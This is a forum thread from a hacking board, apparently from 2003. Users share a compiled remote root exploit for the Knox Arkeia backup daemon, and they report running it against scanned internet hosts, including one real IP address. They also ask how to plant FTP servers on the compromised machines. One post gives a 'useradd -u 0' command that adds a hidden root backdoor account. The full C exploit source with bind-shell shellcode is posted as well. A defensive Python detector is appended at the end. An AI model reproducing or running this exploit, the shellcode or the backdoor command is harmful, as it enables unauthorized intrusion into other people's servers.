Xenos
Ok guys, here comes a new exploit, compiled under Cygwin.
You'll have the details of the script in the exploit research section.
Have fun

haxormse
thx, I'm gonna try this
Tomi
How to scan at / on the exploit: Knox_Arkeia_Pro_v5.1.12_backup_Remote_Root_Exploit bug?
CybA
thx man


greez CybA
Masta
scan port: 617
Certox
What are u using to scan this?
SeNe
Thanks m8, gonna test it..!
Certox
Guessing this isn't compiled for Windows...?
GSecur
Yes it is
Certox
D:\>knox
Usage:
./ŕ_" hostname target_num
Target 1: Redhat 8.0
Target 2: Redhat 7.2

D:\>./ŕ_" xx.xx.xx.xx 1
'.' is not recognized as an internal or external command,
operable program or batch file.
Certox
ok... nm, SEE WHAT RUM DOES TO U!

D:\>knox xx.xx.xx.x 2
[!] connect: Resolver error 0 (no error)


So now... dropping shell.... any ideas?
maZer`-
Big thx Xenos!
Start coding a scanner *smile*
shorto85
Nice job on the exploit. Can't wait for maZer's scanner
maZer`-
Yeah, one problem!
Searched for information this night!
Didn't get anything! I don't know which port and all....
If anyone has the source, please post it

EDIT: I found it, sorry!
Basti
I scanned for port 617, then wrote an autohacker batch and tried it.. there were some results like that, but there wasn't a shell, couldn't do anything

CODE
F:\scannen\Knox>knox 212.87.42.237 1
[*] Connected to 212.87.42.237:617
[*] Connected to 212.87.42.237:617
[*] Sending nops+shellcode
[*] Done, sleeping
[*] Sending overflow
[*] Done
[*] Sleeping and connecting remote shell
[*] Connected to 212.87.42.237:5074
[*] Success, enjoy

Anyone an idea why I don't see a shell like c:\winnt\system32\> ??
ivb
thnx for the compiled exploit mate, tried it on a few results I had in scan..

No luck till now, but saw in reply that it seems to work nicely.

But strange thing is that the 2 results I had from scan, after running the exploit, they're completely down, no ping reply or nothing
-=[MePhIsTo]=-
QUOTE (Basti @ Sep 21 2003, 10:28 AM)
anyone an idea why I don't see a shell like c:\winnt\system32\> ??

muahahahahaha

Red Hat Linux!!!!!!!!!!!
maZer`-
Can't code a scanner! :/
Need a vulnerable IP to code a scanner!

And I haven't had any luck with it!
axl
lol dude!

it's not a Windows bug!!!


but I have a different question: does someone know about a good Linux FTP server that is easy to install remotely?
maZer`-
I'm using proftpd
Mauz
[root@LINUXBAK root]# ./temp xxx.xxx.xxx.xxx 1
[*] Connected to xxx.xxx.xxx.xxx:617
[*] Connected to xxx.xxx.xxx.xxx:617
[*] Sending nops+shellcode
[*] Done, sleeping
[*] Sending overflow
[*] Done
[*] Sleeping and connecting remote shell
[!] connect: Resolver Error 0 (no error)
[root@LINUXBAK root]# ./temp xxx.xxx.xxx.xxx 2
[!] connect: Resolver Error 0 (no error)
[root@LINUXBAK root]#

Strange sploit guys, I haven't found a vulnerable box yet

Any guys also have the same probs as I described above?

GreetZ MauZ
QuadMedic
let's try this one out, it seems ok
elBartalo
D:\>knox XXX.xxx.XXX.XXX1
[*] Connected to XXX.xxx.XXX.XXX1:617
[*] Connected to XXX.xxx.XXX.XXX1:617
[*] Sending nops+shellcode
[*] Done, sleeping
[*] Sending overflow
[*] Done
[*] Sleeping and connecting remote shell
[*] Connected to XXX.xxx.XXX.XXX1:5074
[*] Success, enjoy
SSH-1.99-OpenSSH_3.4p1 Debian_krb5 3.4p1-0woody3

Yeah, I have a shell and now?
What are the commands on unix to list the disk?
Basti
I'm interested in Red Hat commands, too, plz tell us noobs
elBartalo
no basti, I know the commands.... pwd, ls, etc
but I need the commands to upload an FTP server, that's what I mean by "to list the disk", u know
tenka
cd /usr/sbin
./useradd -u 0 -o -p gub nub
][no0b][
lnx source :

CODE

/*
 * Knox Arkeia arkeiad local/remote root exploit.
 *
 * Portbind 5074 shellcode
 *
 * Tested on Redhat 8.0, Redhat 7.2, but all versions are presumed vulnerable.
 *
 * NULLs out least significant byte of EBP to pull EIP out of overflow buffer.
 * A previous request forces a large allocation of NOP's + shellcode in heap
 * memory.  Find additional targets by searching the heap for NOP's after a
 * crash.  safeaddr must point to any area of memory that is read/writable
 * and won't mess with program/shellcode flow.
 *
 * ./ark_sink host targetnum
 * [user@host dir]$ ./ark_sink 192.168.1.2 1
 * [*] Connected to 192.168.1.2:617
 * [*] Connected to 192.168.1.2:617
 * [*] Sending nops+shellcode
 * [*] Done, sleeping
 * [*] Sending overflow
 * [*] Done
 * [*] Sleeping and connecting remote shell
 * [*] Connected to 192.168.1.2:5074
 * [*] Success, enjoy
 * id
 * uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
 *
 */


#include <stdio.h>
#include <stdlib.h>
#include <string.h>       /* memcpy/memset: missing from the posted source */
#include <stdint.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/select.h>   /* fd_set/select */
#include <sys/errno.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>    /* inet_addr/htons: missing from the posted source */
#include <arpa/nameser.h>


#define BUFLEN     10000  /* for getshell()                */
#define LEN        280    /* overflow packet data section  */
#define HEAD_LEN   8      /* overflow packet header        */
#define NOP_LEN    10000  /* nop+shellcode packet          */
#define ARK_PORT   617
#define SHELL_PORT 5074
#define NOP        0x90
#define NUMTARGS   2

struct {
    char         *os;
    unsigned int  targret;   /* return address sprayed over the data section */
    unsigned int  targsafe;  /* "safeaddr": a harmless read/writable pointer  */
} targets[] = {
    { "Redhat 8.0", 0x80ecf90, 0x080eb940 },
    { "Redhat 7.2", 0x80eddc0, 0x080eb940 },
    { NULL, 0, 0 }           /* terminator, usage() stops here */
};


/* portbind 5074 */
const char shellcode[] =
"\x89\xc3\xb0\x02\xcd\x80\x38\xc3\x74\x05\x8d\x43\x01\xcd\x80"
"\x31\xc0\x89\x45\x10\x40\x89\xc3\x89\x45\x0c\x40\x89\x45\x08"
"\x8d\x4d\x08\xb0\x66\xcd\x80\x89\x45\x08\x43\x66\x89\x5d\x14"
"\x66\xc7\x45\x16\x13\xd2\x31\xd2\x89\x55\x18\x8d\x55\x14"
"\x89\x55\x0c\xc6\x45\x10\x10\xb0\x66\xcd\x80\x40\x89\x45\x0c"
"\x43\x43\xb0\x66\xcd\x80\x43\x89\x45\x0c\x89\x45\x10\xb0\x66"
"\xcd\x80\x89\xc3\x31\xc9\xb0\x3f\xcd\x80\x41\x80\xf9\x03"
"\x75\xf6\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69"
"\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";

/* dotted-quad or hostname -> IPv4 address in network byte order */
unsigned int resolve(char *hostname)
{
    in_addr_t       ip;
    struct hostent *hoste;

    if ((ip = inet_addr(hostname)) == INADDR_NONE)
    {
        if ((hoste = gethostbyname(hostname)) == NULL)
        {
            herror("[!] gethostbyname");   /* a real resolver error: herror() is correct here */
            exit(-1);
        }
        memcpy(&ip, hoste->h_addr_list[0], sizeof(ip));
    }
    return ip;
}


/* open a TCP connection to hostname:portnum and return the socket */
int isock(char *hostname, int portnum)
{
    struct sockaddr_in sock_a;
    int                sock;

    memset(&sock_a, 0, sizeof(sock_a));
    sock_a.sin_family      = AF_INET;
    sock_a.sin_port        = htons(portnum);
    sock_a.sin_addr.s_addr = resolve(hostname);

    if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
    {
        perror("[!] socket");
        exit(-1);
    }

    /* perror(), not herror(): the posted source called herror() here, which
     * reports the resolver's h_errno rather than errno, so every failed TCP
     * connect was printed as the misleading "[!] connect: Resolver Error 0
     * (no error)" that several replies in this thread show.  perror() gives
     * the real reason (connection refused, timed out, ...). */
    if (connect(sock, (struct sockaddr *)&sock_a, sizeof(sock_a)))
    {
        perror("[!] connect");
        exit(-1);
    }

    fprintf(stderr, "[*] Connected to %s:%d\n", hostname, portnum);
    return sock;
}

/* relay stdin <-> socket until either side closes */
int getshell(int sock)
{
    char   buf[BUFLEN];
    int    nread;
    fd_set input;

    while (1)
    {
        FD_ZERO(&input);              /* was missing: an fd_set must be cleared before use */
        FD_SET(0, &input);
        FD_SET(sock, &input);
        if (select(sock + 1, &input, NULL, NULL, NULL) < 0)
        {
            perror("[!] select");
            return -1;
        }

        if (FD_ISSET(sock, &input))
        {
            nread = read(sock, buf, BUFLEN);
            if (nread <= 0)
                return 0;             /* remote side closed */
            write(1, buf, nread);
        }
        if (FD_ISSET(0, &input))
        {
            nread = read(0, buf, BUFLEN);
            if (nread <= 0)
                return 0;             /* EOF on stdin */
            write(sock, buf, nread);
        }
    }
}

int usage(char *progname)
{
    int i;

    /* The posted source left the progname argument out of this fprintf(),
     * so "%s" consumed stack garbage instead of argv[0]; that is where the
     * mangled program name in the Windows usage output quoted earlier in
     * this thread came from. */
    fprintf(stderr, "Usage:\n%s hostname target_num\n", progname);
    for (i = 0; targets[i].os; i++)
        fprintf(stderr, "Target %d: %s\n", i + 1, targets[i].os);
    exit(-1);
}

int main(int argc, char **argv)
{
    /* first 2 bytes are a type 74 request, last two bytes are the length */
    char          head[] = "\x00\x4a\x00\x03\x00\x01\xff\xff";
    char          data[512];
    char          sc_req[20000];
    char         *host;
    unsigned int  tnum;
    unsigned int  safeaddr;
    unsigned int  ret;
    uint16_t      netlen;
    int           datalen = LEN;
    int           port    = ARK_PORT;
    int           sock_overflow, sock_nops, sock_shell;
    int           i;

    if (argc != 3)
        usage(argv[0]);

    host = argv[1];
    tnum = atoi(argv[2]);
    if (tnum > NUMTARGS || tnum == 0)
    {
        fprintf(stderr, "[!] Invalid target\n");
        usage(argv[0]);
    }

    tnum--;
    ret      = targets[tnum].targret;
    safeaddr = targets[tnum].targsafe;

    sock_nops     = isock(host, port);
    sock_overflow = isock(host, port);

    // build data section of overflow packet: fill it with the return address
    memset(data, NOP, datalen);
    for (i = 0; i < datalen; i += 4)
        memcpy(data + i, (char *)&ret, 4);
    // we overwrite a pointer that must be a valid address
    memcpy(data + datalen - 12, (char *)&safeaddr, 4);

    // build header of overflow packet: 16-bit length in network byte order
    // (the posted source applied ntohs() to an int, which only worked because
    // ntohs and htons are the same byte swap on little-endian x86)
    netlen = htons((uint16_t)datalen);
    memcpy(head + 6, (char *)&netlen, 2);

    // build invalid packet with nops+shellcode
    memset(sc_req, NOP, NOP_LEN + 1);
    memcpy(sc_req + NOP_LEN, shellcode, sizeof(shellcode));

    // send invalid nop+shellcode packet
    fprintf(stderr, "[*] Sending nops+shellcode\n");
    write(sock_nops, sc_req, NOP_LEN + sizeof(shellcode));
    fprintf(stderr, "[*] Done, sleeping\n");
    sleep(1);
    close(sock_nops);

    // send overflow
    fprintf(stderr, "[*] Sending overflow\n");
    write(sock_overflow, head, HEAD_LEN);
    write(sock_overflow, data, LEN);
    fprintf(stderr, "[*] Done\n");
    fprintf(stderr, "[*] Sleeping and connecting remote shell\n");
    sleep(1);
    close(sock_overflow);

    // connect to shell
    sock_shell = isock(host, SHELL_PORT);
    fprintf(stderr, "[*] Success, enjoy\n");
    getshell(sock_shell);
    close(sock_shell);

    return 0;
}


but a scan to diff. between rh8 & rh7.2 would be fine
greetz
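From the defender's side, the posted source makes this exploit easy to spot on the wire: a header-less 10000-byte NOP sled on 617/tcp, then a type-74 request (the head[] bytes 00 4a 00 03 00 01 plus a big-endian length) whose 280-byte body is one return address repeated with a single patched pointer slot, then a fresh connection to the bind shell on 5074/tcp. The example below is added here and is not code from the thread or from the exploit's author; it is a stand-alone Python check over constructed sample payloads. The header layout, ports and the 0x90 NOP byte are read off the source above; LEGIT_MAX_DATA, NOP_RATIO, MIN_SLED, the sample addresses and the sample traffic are all assumptions made for the example, not Arkeia protocol facts. It also goes one step beyond the thread by correlating the three steps per source host, which is what an IDS rule or a log-review script would want.

```python
"""Flag the traffic pattern of the arkeiad type-74 overflow described in the thread.
Added example; thresholds, addresses and sample traffic are constructed."""
import struct
from dataclasses import dataclass

ARK_PORT = 617          # arkeiad, the port the thread says to scan
SHELL_PORT = 5074       # the exploit's portbind shellcode listens here
NOP = 0x90
REQ_TYPE = 0x004A       # first two bytes of the exploit's head[] ("type 74 request")
LEGIT_MAX_DATA = 128    # assumed: a sane type-74 body is far below the exploit's 280 bytes
NOP_RATIO = 0.5         # assumed: share of 0x90 bytes that marks a sled
MIN_SLED = 1024         # assumed: ignore tiny payloads for the sled check


@dataclass
class Verdict:
    suspicious: bool
    reasons: list


def parse_header(payload: bytes):
    """Return (req_type, declared_len, body) for the 8-byte header, or None if too short.
    Layout taken from the exploit: type(2) 0x0003(2) 0x0001(2) length(2), big-endian."""
    if len(payload) < 8:
        return None
    req_type, _f1, _f2, declared = struct.unpack(">HHHH", payload[:8])
    return req_type, declared, payload[8:]


def nop_ratio(data: bytes) -> float:
    return data.count(NOP) / len(data) if data else 0.0


def sprayed_dword(body: bytes):
    """If the body is (almost) entirely one repeated 4-byte value, return it, else None.
    The exploit fills the data section with the target return address and patches one
    pointer slot with safeaddr, so a couple of mismatching slots are tolerated."""
    if len(body) < 16:
        return None
    first = body[:4]
    if first == bytes([NOP]) * 4:
        return None                       # plain NOPs are reported by the sled check instead
    slots = [body[i:i + 4] for i in range(0, len(body) - 3, 4)]
    mismatches = sum(1 for s in slots if s != first)
    return first if mismatches <= 2 else None


def inspect(dst_port: int, payload: bytes) -> Verdict:
    """Judge one client->server payload on a single TCP connection."""
    reasons = []
    if dst_port == SHELL_PORT:
        reasons.append(f"connection to {SHELL_PORT}/tcp, the exploit's bind-shell port")
    if dst_port != ARK_PORT:
        return Verdict(bool(reasons), reasons)
    ratio = nop_ratio(payload)
    if len(payload) >= MIN_SLED and ratio >= NOP_RATIO:
        reasons.append(f"NOP sled: {ratio:.0%} of {len(payload)} bytes are 0x90")
    hdr = parse_header(payload)
    if hdr:
        req_type, declared, body = hdr
        if req_type == REQ_TYPE and declared > LEGIT_MAX_DATA:
            reasons.append(f"type-74 request declares {declared}-byte body (limit {LEGIT_MAX_DATA})")
        dw = sprayed_dword(body)
        if dw is not None:
            reasons.append(f"body is a spray of one dword {dw.hex()} (return-address pattern)")
    return Verdict(bool(reasons), reasons)


def exploit_sequence(events) -> bool:
    """events: iterable of (src, dst_port, payload) in time order.  True when one source
    shows the full chain: NOP sled to 617, oversized type-74 to 617, then a 5074 connect."""
    stage = {}
    for src, port, payload in events:
        v = inspect(port, payload)
        s = stage.get(src, 0)
        if s == 0 and any(r.startswith("NOP sled") for r in v.reasons):
            stage[src] = 1
        elif s == 1 and any(r.startswith("type-74") for r in v.reasons):
            stage[src] = 2
        elif s == 2 and port == SHELL_PORT:
            return True
    return False


# Constructed sample traffic (not a capture): one benign-looking request, then the
# exploit's three steps in the order the source sends them.
BENIGN = bytes.fromhex("004a00030001") + struct.pack(">H", 12) + b"backup-job-1"
SLED = bytes([NOP]) * 10000 + b"\xcc" * 64              # stand-in for nops+shellcode
RET, SAFE = b"\x41\x42\x43\x08", b"\x44\x45\x46\x08"     # constructed addresses
DATA = bytearray(RET * 70)                               # 280 bytes, LEN in the exploit
DATA[280 - 12:280 - 8] = SAFE                            # the "safeaddr" pointer slot
OVERFLOW = bytes.fromhex("004a00030001") + struct.pack(">H", 280) + bytes(DATA)
EVENTS = [("10.0.0.5", ARK_PORT, BENIGN),
          ("10.0.0.9", ARK_PORT, SLED),
          ("10.0.0.9", ARK_PORT, OVERFLOW),
          ("10.0.0.9", SHELL_PORT, b"id\n")]

if __name__ == "__main__":
    for src, port, payload in EVENTS:
        v = inspect(port, payload)
        print(src, port, "SUSPICIOUS" if v.suspicious else "ok", v.reasons)
    print("exploit sequence from one source:", exploit_sequence(EVENTS))
```

The per-connection checks are deliberately independent, so a host that only ever receives the sled (a failed attempt, like the ones in this thread that left the target unreachable afterwards) is still flagged, while the sequence check is what separates a crash-only attempt from a completed compromise that needs incident response.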
Invision Power Board © 2001-2005 Invision Power Services, Inc.